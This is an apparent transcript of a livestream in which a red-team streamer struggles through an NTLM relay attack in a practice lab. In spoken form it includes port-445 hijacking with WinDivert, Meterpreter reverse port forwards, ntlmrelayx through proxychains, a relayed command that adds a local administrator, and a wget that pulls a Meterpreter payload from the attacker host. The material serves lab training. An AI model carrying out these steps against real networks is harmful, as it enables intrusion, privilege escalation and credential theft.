NTLM Relay X listening. which is Impacket's NTLM relay tool. And then NTLM relay will put this back through the socks. Oh god, the socks. God, this is going to be fucking confusing. It's going to relay it back to the target. Does that make sense? That's basically how it needs to happen. Wouldn't that be weird to see an outbound connection? Not if you put it on a port that an outbound connection is expected on, like 443, for instance. You put that connection on like 443, which is an intended port. Now, if you were doing deep packet inspection and saw that it's SMB traffic, yeah, that'd raise some fucking flags. That would raise some fucking flags right there. But this isn't a technique you would usually do on a red team assessment, anyways, because it is kind of loud. Cobalt's socks module does do a lot of heavy lifting. Fuck. Let's see if we can do port forwarding via the Windows firewall. This is a mess. This is going to be a total mess. I think I should have done a little bit of I think I should have done a little preparation for this stream. I don't know why I didn't. I probably should have. I've been really, really busy recently, so I guess that's my excuse.
A hunter must hunt.
Crumbs, catching the end of streams since August.
Well, it's not the end of a stream. Are you kidding me? Crumbs, we're not done yet. You're about to see the best part. The fuck do you think the end of the stream is? Just glad I can make it. Hey, I'm glad you're here, Pelmic. All right, let's pull Netcat onto the server. That'll allow us to test our port forwarding capabilities. The socks part is a little confusing. I know it is. Again, Cobalt Strike socks is really useful for stuff like this. Again, that's why I was like, shit, I don't know how I'm going to do this without Cobalt Strike's help. But I'll be right back. I'm going to turn the thermostat down a little bit. It's a little warm in here. Alrighty. Okay, let's pull down Netcat. .134.50 Netcat 64.exe. Okay. All right. We'll just we'll leave that, and now we need to research how to do port forwarding with the Windows firewall. I'm pretty sure the Windows firewall will allow this. I need a way to redirect traffic. So the problem is I can't use, the issue we're going to run into is that I cannot use port bender. Was it open? So I can't use this. This is the part I need. I need the part that's going to redirect to a different port. And I think the Windows firewall can do that, but I don't know how. Port forwarding in Windows. WinKey and then firewall. Not that WinKey. Let's just do this. Firewall. I guess we'll turn it on. Okay. Do I do advanced settings? What do I do here? Advanced settings. As port forwarding generally involves inbound traffic. Yes, it does. Inbound rules. You could do this on the command line too. But this is just easier since we are remote desktoped in. Okay, create new rules. Click new rule in the right pane. Port. TCP. Specific local port 445. Okay. Click next and click allow the connection. Choose whether to... Once the rule is created, it'll join the big inbound rules list. Okay, we'll just set it for all of them. Call it Cthulhu rule. Okay, so where is it? I put it in all caps. Is it down here at the bottom? Where the fuck is it? Oh, Cthulhu rule. Okay. Double click it. Okay. At any point, you can right-click the rule and select disable or delete. What? That doesn't tell me how to... Yeah, I told you could do this on the command line too. I guess can you not do port forwarding? This is not port forwarding. This person is very confused about what port forwarding means. Hey, Robert Zach! This isn't fucking Robert Zach. This is not what port forwarding means, Robert! This is enabling a port on... Fucking Robert Zach, my dude. Is this Robert Zach too? Hang on. I have to check. Is this Robert fucking Zach? I could do it with Chisel. No, I can't. Chisel would have to listen like a service. I can't do it with Chisel. It has to be with the firewall because the firewall... This is in Hyper-V. Okay, so it looks like I can't do this. It looks like... Fuck! We might just be going through the explanation of how they want us to do this. Because I don't want to use Cobalt Strike. Again, I don't think I even really can. What is this that you've sent me? Clicking on links in chat, Dan's game. What is this? Fucking Robert Zach cucking me. What is Port Bender? It's a tool built in C++ that works with Cobalt Strike. At least I assume it does. GitHub. When I used it, it had an aggressor script with it. TCP port redirection utility that allows a red team operator to redirect inbound traffic designed for one port, for example, 445 to another TCP port like 8445. Port Bender includes a... Yeah. But you need a driver to do this. Like, you have to put a driver onto the target in order to do this. They see you demonstrating it here. Okay. Do we want to see it with Cobalt? I don't want to be here all night trying to figure out how to get this port forwarding to work. Because I think that there isn't gonna... I thought I might be able to do it with the firewall, but I don't think so. Yeah, the Robert Robert Zach really cucked us there. Got me excited and then cucked us. Do we want to do Cobalt Strike? Or do we want to do... do we want to use Cobalt Strike? Or do we want to... or do we want to do it the way it's done in Holo? That is your choice, chat. Think it over while we do Stream Raiders. I promised I wouldn't use Cobalt Strike for this, so I feel guilty now reneging on that promise, but I don't see another choice. If anyone has an idea, like we can either do it the way that they're going to tell you to, they're telling you to do it in Holo does not require Cobalt Strike, but it's messy and I don't like it, and you wouldn't do it on a real assessment. How come NetSH port forwarding over the firewall? I mean, I guess it might. We can look at it. Someone sent me something about it. I'll take a look at it here in a sec. I assumed that that would be in the GUI. We're trying to figure out how to forward traffic from 445 to a different port, likely 8445. Do we want gold or metals? I know someone talked about them wanting gold. You know what? He spoke up. He gets the gold. Getting the gold. Okay, I thought I'd found the Windows IP tables with port proxy. Then I learned something neat in the process. Allows you to listen on a certain port on one of your network interfaces and redirect all traffic destined for that. Again, doesn't work. This is not going to work. What is... I thought this is like... What is this? What is port proxy? Is this like... Oh, this is just built into Windows. I thought this was something like Chisel. Okay. Listen address and listen port. Creates a listener on the interface with listener address IP and redirects all TCP traffic. In other words, the listener address needs to be an IP of the interface of your machine, and the traffic needs to be destined for the machine to be redirected with this command. I guess we'll give this a shot. Let's give it a try. Fucking Robert Zach. Okay, disable this garbage. Off. Okay, let's open up CMD. Okay, it has a new line at the end of it. Of course it does. So, we will have to add... All right, let's go down here and go IP config. I think it's 10.200.137.35. Let's move this over here so I can see it. Port proxy add v4 to v4. I guess that's IPv4. Add listen port equals 445. Listen address equals 10.200.137.35. Connect address equals 10.200.137.35. and connect port equals 8445. Okay, did that work? Does the fire... I guess the firewall, that doesn't... Is that just done now? Does that just work? Like, if I do... netcat 64.exe tag NLVP 8445. So we're listening on 8445. And we're going to try and connect to 445 now. Test. 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 Did we receive that on this end? No. We did not get test. We were able to oh, we're connecting to 30. Needs to be 35. Test. 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 We still don't get it. We should have gotten a connection. We did not get a connection. It thinks it's connected because it's connecting with SMB. It's connected with SMB right now. This does not seem to work as expected, chat. Yeah, I'm listening on 8445. We're listening on port 445 on this IP address, which is this IP address, and we're connecting to this IP address at port 445 or 8445. Does that make sense? Okay, well, how do we remove this now? Because now I'm afraid this is going to fuck up. NetSH interface port proxy dump. Okay, great. Or NetSH, not netstat.
A hunter must hunt.
Oh.
10 months thanks to the gift from @0Kieran.
What the hell is this? Connecting to 10.41. Well, this is listening on 445 too. That might explain it. How do I remove this? Delete. It's NetSH port proxy. I hate this. This sucks ass. Okay, I'm trying to remove... Can I just remove all of these stupid things? To remove... Okay, reset. Reset. Dump. Okay. Now we reset it. Let's do that. And now it just has our connection. So let's try to connect to it now. Test. We still don't get it. We're still not getting communications here. Someone says someone has one for relaying with Meterpreter, which is what we want to use anyways. So it looks like this NetSH thing is not working for some reason. I don't know enough about this to figure out why. Maybe restart the Netcat listener? I don't see how that would make a difference. I guess we can try it. Why don't I change this to just localhost? Okay. I guess we'll reset it. We're making a connection. The connection is happening. It's just that we're not connecting with Netcat. We're connecting with SMB. It's got to be SMB that we're connected to, because we're not connecting to this. So, yeah, I don't know. That's not going to work. Let's try it with this thing. It's an already solved problem with readily available tools. Okay. Being able to hijack port 445 in the second part of this entry will focus on making it usable for relay attacks. If you want to skip the thought process and relay setup, you can skip directly to the already available solution. Well, let's find about the theory first. Who's the owner of port 445? That would be SMB. Yeah, it's SMB. I don't know why we're going into this big explanation of what we've identified. That port 445 lives in the kernel. Yeah, it's SMB. We can start to think about our strategy. The first thing that jumps to mind is the Linux concept of using IP tables to hijack incoming or outgoing connections. That's what I was trying to do here. Same concept in the name of Windows filtering platform. This is good news since it means it is possible. Bad news seems to be that you need to create a driver for this. You'd think that the NetSH port redirect trick would work, but it doesn't. Okay, so it's not going to explain to me why it doesn't work, but it's telling me that it doesn't work. Okay, so we now have a hard explanation for why NetSH does not work for this. Does that make sense? So let's keep going with this. We have to create a driver for it. That's what Portbender does. You'll actually find the solution, which is easy to use application to redirect incoming connections. Now you see how to use this to redirect incoming connection on port 445 through Meterpreter. The image below visualizes what we're trying to do with our newfound toy. So again, we have our relay victim, our relay read, connecting to port 445 on our infected host. It's going to redirect to Meterpreter, which is listening on port 8445, and Meterpreter is going to redirect it back to our Kali machine back here. Does that make sense? Hey, Digital Warhead. Hey, Al, bummed? I'm not really bummed. We're just kind of puzzling over how to get this NTLM relay to work. Because I don't want to do it the way that it's being done in the... I do not want to do it the way it's being done in the walkthrough. Because the way it's being done in the walkthrough is shit. From this, Meterpreter will set up a reverse port forward. Yep, Set up a working administrative. We got one running as system. Set up the SMB capture server. Set up a reverse port forward with Meterpreter. What is this? Divert TCP connect. What is this? Excuse me. What is this? When the victim now connects to port 445, will receive the hashes in your Metasploit console. And you can do the full SMB relay session. Let's just get the hashes first. And this is with NTLM relay. Yeah, sure. Maybe it's like SOCAT. Yeah, but like, where do I get it? Is it here? A port redirection driver. User mode packet. This doesn't seem like what he's using here. Oh. Let's just go to this again. Yeah, this is it. Oh, this is it. Okay. A fork simply proposes slight... Verizon, the WinDivert must be run with administrator rights. But we have a compiled binary, which is what's important. Okay, let's do this. They come along with the required DLL. Okay. So we'll pull this down. Okay, we'll do this. We do love compiled binaries. That is correct, Infinite Logins. We do indeed love pre-compiled binaries, so I don't have to go on my dev machine and fucking... Okay. Let's just put it in the C drive. That's clearly the sneakiest place to put it. Does everyone understand what's happening here? I'm sorry this is such a mess. I should have done a little bit of research ahead of time. I just... Like, my typical strategy with these streams is if I don't know something, I'll just figure it out on the fly on the stream. Like, I'll literally just figure it out on the stream. But this was a little bit much. I should have had this figured out already, I think. But it is kind of complex. Again, part of the goal is for you to see me struggle and try to figure stuff out. And that's what you're seeing. Who the fuck is it? I just downloaded it. Oh, I didn't download. I downloaded it on my... Damn it. It's here on my... I'll just drop it in. I like the learning process. Okay, good. Yeah, we're going through a learning process. I already knew how to do it. Like, to be clear, I already knew what had to be done. I did not know how to do it without Cobalt Strike. Because the last time I did it, I've only done it once, and I did it with Cobalt Strike. So it was a lot of my job revolves around Cobalt Strike. A lot of it. It is the core tool that I use to do just about everything. A lot of my dev involves development for things meant to run inside Cobalt Strike. It's all Cobalt Strike all the way down. So when I'm taken away from Cobalt Strike, I often have to fumble a little bit to figure out what's going on. Let's just put it in tools. Shut up, antivirus. Helen of Tor! I am not molding, I am learning! Did you not hear me say learning? There is no molding happening here, and just because you're making me laugh, Star is not gonna come in! She doesn't like it when I yell! And I'm just gonna blame the small human on it! I'm gonna tell her later, Daddy's yelling because the small human said rude things in chat. Okay, upload. Mount tools. What the fuck is it called? Peepo, leave. My desk is vibrating. You be sweet. I am being sweet. People are being rude to me. Also, Star does not like Helen of Tormore. That is not true. That is fake news. No, she does not. She's absolutely delusional. She hangs out with me at night almost every time. She slept with her like once while she was here. It is a fabrication. Divert tcpcon.exe. Oh, come on. Is it not mounted? God damn it. I didn't even update. Oh. I was going to tool. Okay, my tools directory is mounted directly on my work laptop, but not on this. I think I got the path wrong. But while we're here. This. Projects, tools, divert tcpcon.exe. There we go. Let's do ls. And we can see it in there. Okay. So let's do... I guess we can do this inside of the... Alright, so what does it want us to do? Let's just follow the instructions here. Because I don't want to be here all night. Okay, so we have administrator set the SMB capture server. Okay, so background this session. Sessions. There's our interpreter sessions. Use auxiliary scanner SMB login. Show options. Set SRV port. Is it SRV port? I don't see SRV port as an option here. Super. Target hosts. I guess that does work. Run tac J. Set R hosts. I'm sorry, I've never used this module. What? Okay, we just won't listen on Meterpreter. Oh, God. The relay is going to be such a pain. because we have to go back through the SOCKS proxy. I guess we can proxy chains? I guess we have to proxy chains it. Yeah, I guess we proxy chains. So proxy chains. Just copy this out. Okay, so yeah, we don't need to use that SMB login thing. We're just going to do the NTLM relay. So the IP address is what? It's of the DC 10.200.137.30. .30. SMB v2 support is good. We want proxy chains 4. Okay. Okay. So Impacket is now listening on port 445 for SMB connections. Now, NTLM Relay X's best friend is Responder. You're typically going to use, when you use this tool, you'll usually use it with Responder. In this case, we'll set up a port forward. We'll add a route through Meterpreter. Okay, wait a minute. Okay, here's what it's showing me to do. When I add a route in Meterpreter, this is the IP we're trying to target here? Yeah, I guess.
A hunter must hunt.
Okay. So we'll add a route. Bataflaka, thanks for the 9 months. We're having a baby. What are we naming it? That's the question. Okay, let's add the port forward. So port forward add TAC R because we want it to be a reverse. We want the connection to go from Meterpreter back to our Kali machine. 8445 is good. We're going to listen on port 8445 and we're going to the local port we're going to listen we're going to send it to is 445. And we'll listen on 127.001. Okay, so it's listening on localhost port 445. Does it need to be localhost? Let's also add one for the IP address. Just to be safe. 10.200.137.35. Oh, it's listening on all ports. Okay. So it's fuck. How do I remove one? Delete. Oh, it's just flush. Okay, we'll do that. Let's do... Okay, so we're listening on this IP address, port 445, and we're going to redirect to port 8445. Okay, there we go. So... Now... Wait. Now I'm confused. No, I think it needs to be localhost. I haven't done Meterpreter. I do think it needs to be localhost. I think it was right the first time. Because we're listening on port 445 on our host. Yeah, port 8445. I think that's the way it works. I added myself to domain admins group in my red team engagement. Congratulations, Tiberius. I'm so happy to hear that. Nice job. All right, so now we do help. We're going to execute TAC F. I'm just going to paste it directly in here. Okay? So now... Oh, this needs to be 8. What was it? $6508. Can I do kill? TAC H? Kill 6508. Following PIDs are not valid, so it didn't even work. Great. 5964. It's not executing. There's no process. It's crashing. Great. Fantastic. WinDivert.dll was not found. Well, that would explain it. So I guess we need WinDivert.dll. I thought it came with the DLL. Let's go back to the GitHub page. Compiled binaries. WinDivert.dll. Let's just download all this crap. I don't know if we need all this crap. I'm downloading it anyways. We're uploading them all, chat. Oh, I didn't move them yet. Just gotta move those into my tools directory. Okay. WinDivert.dll. Okay. Upload. We're just going to upload all this crap. Upload that. I love uploading 16 files to the target in order to get this shit to work. And we got to upload this driver. Okay, let's try executing it now. Okay. That's a good sign. So now, I think if we connect to this box on 445, we should now get a connection on port 8445. I think. Up! Uh-oh! Uh-oh, chat! What do you guys think this is? What do you guys think that is? That's some poor soul That's relay read. Right on time. That's our good friend relay read. We could just use inve from here, honestly. No, we can't, actually. We cannot use inve. SMB is still listening. Well, we'd have to use inve and listen on port. I don't know if you can listen on a different port with inve. I'm assuming you can. Okay, so that's relay read. It is working. Now, the problem... Where did I put my walkthrough? Here we go. So what is the TAC A? I'm confused on what. You gonna give me options for this? Come on, give me... If you're gonna make a tool, fucking document it. Is there a fucking... Okay, read me. Are you gonna tell me what the options do? Fuck it, it's working. Okay, it's working. That's the important part. Okay, so the problem... If, like... We're trying to listen... on port 8445 here. Or not here, but... Let's go back. Let's just go up. And I need to get these port forward rules correctly. Or correct. So, what... Is this the correct command? Because I'm trying to relay from port... it definitely needs to be reverse. Okay. Port forward. Let me get to documentation. I'm not familiar with port... I'm not... Okay, we want the reverse one. I want reverse. God damn it. I need a reverse port forward. I mean, we did redirect the port. The port is being redirected. That is successful. So, at this point, we need to figure out how to port forward back. Which shouldn't be too hard, but our netcat was able to listen on that port. So, we must have put in... I think we put in the incorrect command. Because... Port forward... I have so many goddamn tabs open, I can't keep track of it. So this says... Set up a reverse port forward, so it should be listening on port 445, lowercase l 445. Like... lowercase l, local port to listen on. Reverse is local port to connect to. Okay, so the local port we're connecting to is 445, so that does look like it's correct. Capital L is local host to listen on. Local host to connect. Reverse is local host to connect to. We're connecting to local host. Okay, that makes sense. So I apparently did have it right. I think. Port 8445. We're listening on 8445, right? Yeah? Localhost 445. Yeah? That looks like it's right. Okay. Oh my goodness. What is happening? We were getting connections this whole time, it looks like. So let's see if we get a connection. We do get a connection. Unsupported mech type. Hang on. Stop. Oh, I know what the problem is. We have to add the socks option, I think. Let's try that. Address already in use. Oh, listening on port 1080. Oh, no, it's... fuck. No, it's not the socks option, because we're proxy chaining it. We're getting connections, but it's not working. Yeah, I know RelayX defaults to 1080, but... We're already using proxy chains. It should handle the socks part for us. Proxy chains should handle it, and it seems like it's working. Proxy chains seems like it is working, but it's erroring out. I don't understand why it's erroring out. Why are we erroring out? Unsupported mech type. We're getting connections. I don't know what this unsupported mech type is. I've never seen that error. What is the .30 address? It's the DC. It's the domain controller. It said 1 minute a second ago, and I wanted to just show you guys. It said 1 minute left. Yeah, it looked like it worked. Maybe we can get... we can execute a command, I think, with tac-c. Is it tac-c? Yeah, tac-c. So we'll execute a command here. Net user alhazred add net local group administrators alhazred add. So we'll execute a command here. It could be it's by default NTLM relay tries to dump the SAM file. Okay, we're listening to see if we get a connection. Come on. What is causing the SMB connection? I'm not sure who exactly is connecting to us. Tell me that this fucking shit didn't die on me. We were getting connections immediately last time. No, it's still connected. Nope. Oh. Yeah, we're good. Are we getting connections over here? We're not getting connections over here anymore. Is Relay Reed tired of, Did she have a rough day? Is it... What's happening? I mean, we didn't change any of our settings, did we? This didn't error out. Well, add tac debug, I guess. I mean, we're not getting any connections now. It doesn't seem like it's connecting. What is going on? Come on. What's happening? It was just connecting. Come on now. I don't think it's the semicolon that's breaking it. We're not even getting connections. I mean, it was working. Well, again, we should still get a connection, even if the command... Okay, fine. Fine. I'll remove it. I don't... Like, we're just gonna get the same shit again. I don't know why... Like, we would still see the connection. It would just error out. We're not seeing any connections anymore. Like, we're not seeing any connection. There's no, like... Come on, dude. Like, we're so close. Come on here. What? We just got a fucking connection, and it's deciding not to give it to us now. Come on. You little bastard. What is happening?
What are you doing, step bro?
I'm trying to make this work, step sis. Doing my best. Yeah, we can't bind to it. That makes sense. I mean, it seems like everything is still working, and yet whatever we did is no longer connecting to us. I don't know what's happening, chat. We were just getting a connection. I don't know what to say. We only currently have control of this system. I guess I could remote into a different system and try to load a file share, but I don't see the point of that. The DC is fine. Tell me I don't have to reset all this garbage. Come on now. Yep, I can proxy change to the DC. It's not the DC that's connecting to us anyways. I don't know what it is. I think it's probably... From SRV admin. It connected just fine, and now it's complaining of Kerberos. The port forwarding is working fine. Like, we've already seen it work. We changed nothing. I don't know why everyone wants to make sure that the port forwarding still works. We've changed literally nothing. It was working 5 seconds ago. I don't... Come on, I don't want to reset this entire fucking lab. God fucking damn it. It didn't time expire. Everything is still up. Like, I don't know why. I want to finish this dumb fucking box. Like, I just want it done. What is happening? I'm actually pissed now. This is fucking ridiculous. I have no fucking idea what is happening here. This dumb fucking box. This is why you don't do NTLM relay in your stupid fucking CTF. Your stupid fucking CTF. Because it never works right. For absolute fuck's sake. Ah. I can't even reset the lab. It doesn't even let me reset the fucking thing. Like, I can vote to reset it, and it's not resetting. Okay. I don't know what to tell you guys. I'm really pissed. I don't know why this is not coming in. We're not getting any connections. I'm not gonna bother debugging the connection. It doesn't fucking matter. If the port forwarding does work. We've changed literally nothing. Everything still works. There's no reason the port forwarding would not still work. I'll just reset it all. Like, it's just 2 fucking commands. Like, I don't know. Okay. No connection. Like, this is why you don't do NTLM relay in CTFs. Because it's always a fucking complete disaster. It never works the way you'd expect. This is garbage. I don't know, like, it's... Whatever's connecting to us is probably just a box that we don't control. So I have no way of resetting it. I don't have any way of fixing this. I tried to reset the machine. Not working. I just extended it so it's going for another 2 fucking hours. This sucks ass, dude. If you make a box, don't do NTLM relay. It's not fun. This is garbage. Like, this fucking sucks. I've been working for the entire stream towards this. We finally get a connection. We get a weird fucking error, and then it just stops connecting to us. Okay. Yep. Well-made lab. Like, why are you guys saying the DC is still up? It's not the DC connecting to us. We have seen that the DC is still up. We reset all the port forwarding. Everything is still working. As far as I can tell. We're not getting connections. I don't know why. I don't know why all of a sudden it decided to stop connecting to us. What was the error? It was like some Kerberos error. Protocol unsupported or something. I mean, I don't know what to say. Even if we knew what this error was, how to fix this error, we can't get the target to connect to us anymore. I don't know. It just decided to stop connecting to us. Because whoever made the box just did it really poorly. Is this going to mention the error at all? Is there some indication of what the fuck this error is? No. This is 0 out of 10. Worthless. This is a piece of garbage. Okay, just remove that. Please give me some relevant fucking... Complains about it here, but we still get... Yeah, we don't even get the fucking NTLM hash. So it's connecting with Kerberos. Okay, so that's an expected failure. Connection controlled, but there are no more targets left. Okay, is it a cache thing? Is it does NTLM Relay have some kind of dumb fucking cache that's blocking us? Is there a fucking cache? Maybe it is connecting to us and it's just ignoring it because we're using a different target. Is there an NTLM relay cache? Hey. Well, it looks like it did work, and it just didn't give any good output. That looks like it actually did work. It just like gave garbage output. That looked like it failed. Okay, well, I didn't know NTLM Relay did that. There's your problem then. It's not connecting to us because it already has these hashes. It's not bothering, I think. I haven't used NTLM Relay X in a while, I confess. Let's hopefully this will work. Oh, we might have to use the local auth flag. Yeah. Local auth. Still doesn't like it, huh? I did local auth correctly, didn't I? It looks like it dumped the SAM file. Did I do local auth correctly? Yeah? Maybe local authentication is disabled. So let's just RM. Just remove that. Let's not do it in proxy chains either. Let's do this. Let's do the socks thing. And then we can if we use the socks thing, we can then secrets dump through the socks proxy. So we'll exit out of here. That's going to break our proxy chains. It's also going to break our RDP. Shit. PS? It's not going to break our... I guess that's not working anymore. Okay, execute tac f divert tcpcon.exe. And what was it? Going back over here. 445 and 445. Or 8445. Okay. 5828. Is it still... I guess it's still listening? I thought it would die since we lost our remote desktop, but perhaps it is still listening. Alright, let's do this again. Let's see if we get a connection now. Oh, we can't because we took down the proxy chains. I just want to make sure it's still going to work. Also, I should have marked down that those hashes. I don't think that was the right password, was it? No. God, I want this to be done. Linux rules. Okay. I did the tac-d command, didn't I? Tac-d. Okay. All right. Died? No. It must be because, no? We lost this one too, I think. It must have been because we executed those commands through the proxy. God damn it. Yeah, great. So we'll do the proxy not on 1080 then. We'll do it on 1081, and we'll have SMB relay listen on a different proxy. Oh my God, how can I not remember this password? It's one word. Okay. So we set up the port forward, right? Okay. So now we gotta do proxy chains. Okay. And then we'll do X-free RDP. That is not the last... Okay. That. There it goes. It looks like it's still doing its port forwarding. Our divert TCP connection's still working, at least. What is happening? Hello? Can I type? Did this work? Let me just kill this and just restart it. CMD. Run it as administrator. I don't think you need to run it as administrator, but we're going to do it anyways. C. Divert TCP connections 445 to 8445. Where did my it's in the other user's desktop. Wadamet desktop. Oh my god. Why isn't it here? Oh, for fuck's sake. Is it here? Oh my god. Windows Defender is not running, at least not in active mode. Maybe the passive mode killed it or something. Okay. Oh my god, I want this to be done so fucking bad. wget http://10.50.134.50 Cthulhu meter.exe tech o Cthulhu.exe. Okay. Oh, for fuck's sake. Okay, run. Okay. Hey, X-Vimmer, good to see you. Okay, there's we got our interpreter sessions. Get UID. We should be running as my administrator user. Yeah. Okay. So we want to do that port forward now. Okay. So that's working. Now if we run this, because we don't have fucking... Let's see if we get connections now. Address already in use. For what? What's already in use? Oh, the web server. Okay, are we going to get a connection now? Please give me a connection. Come on, please. This is fucking rude. Stop putting NTLM relay in your CTFs. It's not cute. We'll put these hashes in here. But we couldn't authenticate for some reason with them. We're still not fucking getting connections. This is absolutely driving me insane. I thought maybe there was some kind of cache stopping it, but apparently not. It's just not connecting to us. This is fucking rude. Whoever set this up, this is fucking garbage, dude. Okay. Let's kill the port forward. I'm going to try and reduce what the fucking possible problem is here. Flush. Okay, no port forward. Okay, we're listening on 8445. I don't think the thing is connecting to us anymore because we got a connect. Oh, there's the connection. There's the connection. So NTLM Relay X is just actively ignoring it. Like, NTLM Relay X is actively ignoring it. How do I clear the stupid cache from this stupid tool? Oh my god, dude. No, did I set it to 445? I don't think I did. I'll check it. Oh yeah, I did chat. I copied and pasted it. That would explain it. Thank you. Thank you very much. My bad. Good call. At this point, I'm not even debugging properly. I just desperately want this to work. Thank you very much for correcting that. Simple error. Okay. Hopefully we will now get connections. I'll restart this stupid thing anyways. Give me connections. I think it's actively ignoring those connections. There it goes. Okay. We are making progress. So now we have the SAM dump again, or at least we should, but we don't. Connection was reset. Oh, I'm doing it through proxy chains. I'm trying to relay through proxy chains. That's why it's not working. It is getting the connection. So let's do. Well, it should work through proxy chains, shouldn't it? Oh, it's trying to connect to 1080. Oh, did I not change my proxy? I thought I changed my proxy chain settings. Oh, because of sudo. There's the issue. That's the issue. Okay, we'll just change this. It's using a different proxychains.conf because I sudoed it. So this should be 1081 instead. We're just going to make sure we get the connection. Okay, now it should connect properly. Come on. No tax. Yeah, no, we're not going to do the taxox yet. We're going to do that here in just a second. We need to turn off proxy chains for that. Like, what? I hate how long I have to wait here. Did I put this in right this time? Why am I still waiting? It's getting connections. I think it's actively ignoring them. What? Why are we not getting a connection now? Like, I hate this. This fucking blows ass, dude. Why are we now not getting a connection? Yeah, sudo and non-sudo are considered two different users. Why are we now not getting connections? Like, what is happening here? Like, this is driving me fucking nuts. Like, I hate this. Like, we just mysteriously don't get connections now? What is happening? Let's flush this again. And let's listen on this port. And we immediately get a connection. Like, we listen on the port and we immediately get a connection. Like, instantly. And yet, NTLM Relay is not seeing it. Or it's ignoring it. What a fucking disaster this is. Check sudo file for the hashes, dir. I sudoed it before. I did the exact same thing. I don't see where it would be. Where is this dumb fucking cache file? This is maddening. I hate this so much. This has been miserable. Like, can we please... An NTLM relay, please. Spare me, you piece of garbage. What's that port 1081? It's because proxy chain or NTLM relay has to set up, tries to set up a SOX proxy on that port. What? I don't know why it's doing this. I've never seen this before. I have no idea what that is. I don't know what this is. Does anybody know what NTLM relay is doing here? We have to remove this. I don't know what NTLM relay is doing here. This thing, I hate this. I really hate this. This sucks ass. I don't know what we're doing. I don't know what this is. It didn't do this before. I don't know what it's doing. I hate this. This sucks. I don't know why this sucks so bad. Oh god, I wish this didn't take NTLM relay. This sucks so much. How do I do it? How do you want it done? Like, what do I need to do, NTLM relay? What do I need to do? Like, genuinely, what needs to be done? I hate this fucking program. I don't know what it wants. It's just ignoring connections. Oh my god. This is driving me insane. It's just ignoring connections. When we put anything up other than NTLM Relay X, we immediately get connections. But NTLM Relay X is just ignoring them. Well, we're not getting connections now, it looks like. Now why aren't we getting connections? Like, I love playing the why aren't we getting connections game. This is really a great fucking challenge. I love the why aren't we getting connections game. It's so fun. What a hilarious game this is. The why aren't we getting connections game. I don't know what's going on here. Is Meterpreter busted again? Nope. Meterpreter's not busted. We don't need proxy chains for Netcat. Like, I'm just trying to make sure we're getting connections. Why aren't we getting connections now? We're forwarding. We're doing the same stuff. No, it's not 10. It's not the config file. We're not using proxy chains here. We're not using proxy chains here at all. But that was only the proxy chains config file. I don't know why it's decided to not work now. I don't know. This is very confusing to me. Meterpreter seems to now be failing because we're listening on 8445. Let's just try changing it to 4445. I don't know. I don't know what to do at this point. This has been nightmarish. This is as bad as it possibly could be. I'm losing my fucking mind. We're going on 4 hours here, and I can't get this to work. This is absolutely maddening. Oh, there's the connection. We got a connection. Do we get a connection here? The machines have over an hour left. An hour and 20 minutes. Is it just Meterpreters port forwarding sucking ass? Like, what is happening here? Yeah, it's Meterpreter. Meterpreter's port forwarding is sucking ass. Great. The problem is with Meterpreter, it looks like. Exit. We'll try the other Meterpreter session. Okay. Doing a reverse. This is all, we're listening on local 445. And still not get, there's the connection. Okay, progress. It turns out Meterpreter just decided to fucking, just decided to shit the bed. Thanks, Meterpreter. Appreciate it. Okay. Let's do this just with the socks. I'm going to need to change Etsy sudo vim etsy proxychains.conf. This needs to be set to 1080. Okay, we're going to do this without NTLM relay X, or without proxy chains. Socks. I don't know why this is happening. I've literally never seen this. I have no fucking idea why it's doing this. Great. We're still not getting connections. Great. Now we're still not getting connections. NTLM Relay X is... I'm so done with this, dude. This is absolutely fucking miserable. Like, this absolutely fucking sucks ass. I have no idea what is happening here. Why NTLM Relay X is doing this. Why it's putting me into this dumb fucking command prompt. I've never once seen this in my entire life.
The reason it's happening is because you are a Malding.
Yeah, that's fair. Okay. Start NTLM Relay X, specifying the domain controller and protocol. We did that. This is the exact command we ran. We did this, basically. A different way, but... I hate this so much. This sucks so much ass. I don't know what NTLM Relay X is doing. Are we still getting connections at Netcat, and is NTLM Relay X just fucking ignoring them? You know, like always? Or is, I guess, Meterpreter decided to stop again. Like, I don't know what's going on here. This is fucking mayhem. Like, this is absolute mayhem. Meterpreter just seems to be stopping the port forward at any given moment. It gets one connection, then just decides that's enough. No more connections required. This is unbelievable. I don't know why Meterpreter is doing this. This is a piece of garbage. Okay, goodbye. This fucking sucks. I'm amazed at how fucking terrible this is. And how miserable this is to do. Start another fucking Meterpreter session so it can relay one goddamn connection and then decide just to stop. Yippee. Do this again for the millionth fucking time. I don't know what this is. I don't know why NTLM Relay X is deciding to do this. This sucks ass. This is patently fucking horrible. Meterpreter just is not port forwarding at all. NTLM Relay X is just inexplicably failing at all times. God. I would give any amount of money just to have this work. Like, I am so done with this. But I don't want to fucking leave because I'm going to have to come back to it and it's the same fucking mayhem is going to happen. Like, this absolutely fucking blows on the order of infinity. This is so incredibly horrible. And chat's constantly going to ask me to finish this fucking piece of trash. So I gotta get it working. This has got to work. Don't know why the connections aren't coming through. Doesn't make any sense. Hey, very clever monkey. We're malding our fucking we're losing our fucking minds over trying to get this stupid fucking exploit to work in this very poorly made lab that doesn't work. No part of this lab works. And I'm just trying to get it done so I can move on with my fucking life, dude. This is just miserable. I don't even know what to do at this point. Like, we get one connection and then it just stops. Like, and then it just fucking... Like, we don't get anything. Like, it's just nothing. We don't get any connections. Nothing happens. Piece of garbage lab is a piece of garbage. Like, I don't know what to tell you guys. I seriously have no fucking idea what is happening. Like, NTLM Relay X is not getting connections. If it gets a connection, it just fucking ignores it. I don't know what we do. I don't know what we do from here. Like, I'm trying over and over again. I don't even know what to try at this point. I don't know what to try. We're redirecting to port 445. I'm just going to listen. Are we still getting connections? Yep, getting connections. Metasploit is not redirecting them. It's just not happening. Metasploit is just choosing not to redirect them. I don't know why. I have absolutely no idea why. This is completely mystifying. Yeah, I'm tilted as hell. This is fucking miserable. I can't reboot it. That's the problem. I can't reboot it. It's a whole network. It's a whole network of Windows machines, and I can't reboot them. I can vote to reset, but I cannot reset them myself. I don't know what's happening. Like, we're not getting a connection here. I have no idea why we are not getting a connection. I have absolutely no fucking clue. Meterpreter is not redirecting. I don't know what to say. I don't know what to say here. Meterpreter is just failing. Like, straight up. This is a piece of garbage. It's fucking terrible. Like, this is fucking terrible. It doesn't redirect. It doesn't do anything. Like, I don't know what I'm supposed to do here to get this to work. Did we just lose our Meterpreter session? Yeah, we lost our Meterpreter session. It just died. That's good. Thank you. Oh. This is incredible. It is incredible how poorly made this lab is. Okay. Did we lose lab connectivity? What's happening? $1081. I don't know. Now we can't. Did the fucking lab quit? Doesn't look like it did. It does not look 